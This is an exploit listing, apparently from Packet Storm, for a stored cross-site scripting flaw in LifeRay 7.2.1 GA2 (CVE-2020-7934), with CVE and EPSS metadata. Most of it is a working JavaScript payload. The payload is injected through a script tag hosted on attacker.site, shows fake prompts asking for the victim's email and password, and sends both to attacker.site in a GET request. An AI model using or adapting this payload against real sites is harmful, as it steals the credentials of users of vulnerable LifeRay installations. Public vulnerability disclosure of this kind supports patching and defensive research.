Lucene search

K
packetstorm3ndG4mePACKETSTORM:160168
HistoryNov 23, 2020 - 12:00 a.m.

LifeRay 7.2.1 GA2 Cross Site Scripting

2020-11-2300:00:00
3ndG4me
packetstormsecurity.com
542
exploit
cross site scripting
liferay 7.2.1
cve-2020-7934
javascript payload
phishing

EPSS

0.001

Percentile

49.3%

`# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS  
# Date: 10/05/2020   
# Exploit Author: 3ndG4me  
# Vendor Homepage: https://www.liferay.com/  
# Software Link: https://www.liferay.com/  
# Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED)  
# Tested on: Debian Linux  
# CVE : CVE-2020-7934  
# Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934  
  
# NOTE: The attached proof of concept is a javascript payload,  
submitted as a ".txt" file to attach via email as ".js" is often  
blocked.  
  
// CVE-2020-7934 Cred Phishing Example Attack  
// Author: 3ndG4me  
// Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934  
  
// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant:  
// <SCRIPT SRC="//attacker.site/cve-2020-7934.js">  
  
var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", "");  
var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", "");  
  
  
console.log(email);  
console.log(password);  
  
var url = "http://attacker.site/" + email + ":" + password;  
  
$.get(url);  
`

EPSS

0.001

Percentile

49.3%